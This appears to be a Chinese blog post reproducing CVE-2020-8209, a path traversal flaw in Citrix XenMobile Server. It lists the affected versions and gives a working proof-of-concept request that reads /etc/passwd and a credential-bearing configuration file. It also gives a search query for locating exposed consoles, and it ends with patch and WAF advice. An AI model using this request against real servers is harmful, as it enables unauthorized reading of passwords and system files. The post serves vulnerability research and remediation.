漏洞简介
XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。
CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。
影响范围
RP2之前的XenMobile服务器10.12
RP4之前的XenMobile服务器10.11
RP6之前的XenMobile服务器10.10
10.9 RP5之前的XenMobile服务器
漏洞复现
poc:
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
复现成功:
/etc/passwd
/opt/sas/sw/config/sftu.properties
命中率还是挺高的:
app="XenMobile-控制台"
结果如图:
修复建议
官方补丁会删除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp,因此对help-sb-download.jsp的所有请求都可以视为非法请求,并且应被WAF阻止。
建议检查访问日志中是否有以前的请求。
参考:
https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
本文始发于微信公众号(don9sec):漏洞复现 CVE-2020-8209
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论